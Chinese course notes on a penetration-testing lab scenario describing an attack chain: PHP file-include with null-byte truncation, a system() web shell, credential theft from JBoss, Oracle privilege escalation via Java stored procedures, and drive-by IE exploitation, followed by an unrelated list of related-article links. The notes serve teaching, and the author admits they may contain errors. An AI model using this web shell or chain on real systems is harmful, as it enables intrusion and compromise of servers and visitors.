java 渗透_渗透课程笔记
由于仅仅是听课笔记,错漏均会有,原理是正确的
1.环境
主机1 192.168.0.101
1)win2003操作系统
2)开启apache+mysql+php+wordpress
其中 apache以低权限用户webmaster运行,使用端口80
wordpress暴露漏洞形式如下
XXX.php
$path_array = array(
"xxxpath" => "../../"
...
);
$postValue = $_POST;
$tmpArray = array_merge($path_array,$_POST);
include_once($tmpArray["xxxpath"]."YYY.php");
3)开启jboss+oracle
其中jboss以webmaster权限运行,使用端口1003
oracle以默认的system权限运行
4)防火墙开启,仅仅允许80,1003
主机2 192.168.0.102
1)win8 操作系统
2)ie低版本
3)脚本命令ie不断访问 192.168.0.101 首页
4)防火墙开启,仅仅允许80端口
攻击机 192.168.0.103
2.渗透过程
主机1
1)wordpress漏洞->apache web->low privilege
2)jboss->oracle->oracle dba->system privilege
主机2
3)apache web index.html->挂马->ie低版本漏洞->主机2
3.具体过程
1)上传cmd.txt文本,其内容为一个web shell形式如下
$contents ="<?php \n system($_REQUEST[\"cmd\"]); \n?>"; #记得不太清,大致是这个意思
file_put_contents("control.php",$contents); ###目的就是制作一个控制脚本到服务器上
?>
2)构造链接
XXX.php?xxxpath="xxx/cmd.txt%00"
从而使得
XXX.php中产生 include_once("xxx/cmd.txt%00"."YYY.php"); ##这导致%00后面的东西被截断,而cmd.txt被执行,从而生成control.php到服务器端
此时已取得webmaster的权限,可以用菜刀等软件直接操作webmaster的各项权限
3)由于有webmaster 权限,此时可以查看jboss链接oracle的账号密码,即可得到oracle的低级权限
4)通过oracle的尚未被去掉的提权接口,升级为oracle dba
5)将用户切换为oracle dba 此时可以书写 java 存储过程,此存储过程是system权限,此时实际已经得到系统的超级用户权限
6)可以书写java存储过程添加win2003系统管理员用户
7)在主机1的 index.php 中挂马,针对早期ie的缓冲区溢出
8)主机2访问index.php导致ie中的缓冲区溢出执行给定的下载木马并执行
java 渗透_渗透课程笔记相关推荐
- Java毕业设计_数据结构课程在线学习辅导系统
数据结构课程在线学习辅导系统 数据结构课程在线学习辅导系统mysql数据库创建语句 数据结构课程在线学习辅导系统oracle数据库创建语句 数据结构课程在线学习辅导系统sqlserver数据库创建语句 ...
- ssrf漏洞内网渗透_渗透技巧之SSRF
SSRF--服务端请求伪造,上一篇,我谈到了CSRF客户端请求伪造,这个是我们通过攻击用户,引诱客户点击我们伪造好的表单,从而达到我们攻击的目的,是从客户端发起的,那么SSRF服务端请求伪造当然是通过 ...
- ssrf漏洞内网渗透_渗透小白看了也能明白的SSRF
什么是SSRF 含义 服务器端请求伪造(SSRF)是指攻击者能够从易受攻击的Web应用程序发送精心设计的请求的对其他网站进行攻击.(利用一个可发起网络请求的服务当作跳板来攻击其他服务) 攻击者能够利用 ...
- 零基础JAVA——黑马程序员课程笔记
视频地址:点击访问 (我这里开发工具有时候用eclipse有时候用IDEA,看每个人的习惯) (文中代码部分不会和老师讲的一模一样,因为我都是在看到老师给的案例后自己尝试写的,推荐大家这样做,可以帮助 ...
- 六自由度机器人逆向运动学_【课程笔记】Notes for Robotics/机器人学 (Part1)
之前打ICRA2018的Tidy Up My Room challenge的时候就已经接触了一些机器人学的内容,不过以偏应用的ROS,轨迹规划,控制居多,对于机械臂和力学确实了解的不多,这学期选了ME ...
- active控件和java脚本_【学习笔记】在原生javascript中使用ActiveX和插件
什么是插件 现在的浏览器提供了大量的内置功能,但仍然有一些工作无法完成,如播放音频和视频.插件及其扩展浏览器功能就尤为重要. 插件是可下载的应用程序,可以插入到浏览器中,现在有很多不同的插件,常用的有 ...
- 《Java 核心技术面试》课程笔记(十)
如何保证集合是线程安全的? 典型回答 Java 提供了不同层⾯的线程安全支持. 在传统集合框架内部,除了 Hashtable 等同步容器,还提供了所谓的同步包装器(Synchronized Wrapp ...
- 《Java 核心技术面试》课程笔记(十一)
Java 提供了哪些 IO 方式? 典型回答 Java IO 基于不同的 IO 抽象模型和交互方式,可以分为: BIO,传统的 java.io 包,它基于流模型实现. 提供了我们最熟知的⼀些 IO 功 ...
- 【前端学习之路】ES6新特性 Promise基本方法 、async函数(阮一峰老师、小马哥_老师 课程笔记)
1.Promise.then()方法 Promise 实例具有 then 方法,其第一个参数是 resolve 状态的回调函数,第二个参数是 reject 状态的回调函数,它们是可选的. then 方 ...
最新文章
- Java基础语法运算和控制符
- tcpdump移植和使用
- Lyft估值目标近200亿美元 有望成今年来美国最大IPO
- pyhton/Perl设置 sublime text2
- MemSQL可以为时间序列应用做些什么
- 1623: 街道路径条数
- 【Flink】Flink 写入 AnalyticDB MySQL
- arcgis select by attributes一次选多个_优化体系--记一次生产数据库sql优化过程--组合索引...
- 360系统修复过程中卡慢问题的解决方案
- 【教程搬运】廖雪峰Git的使用教程(二)
- FreeSWITCH权威指南-基础篇-1.4-信令
- css静态网页设计 北京旅游(1页) 北京旅游网页设计制作 简单静态HTML网页作品 我的旅游网页作业成品 学生旅游网站模板
- 有限元法分析工程实际问题的一般过程
- bottleneck resnet网络_ResNet网络结构分析
- Linux编辑grldr文件,使用syslinux完美引导GRLDR。
- 拓扑图绘制工具开源_3个用于绘制家谱的开源家谱工具
- NLP基础知识点:ROUGE
- 如何在 Facebook 上实现高效社交营销
- DTW 动态时间规整
- Linux的mask什么意思中文,mask是什么意思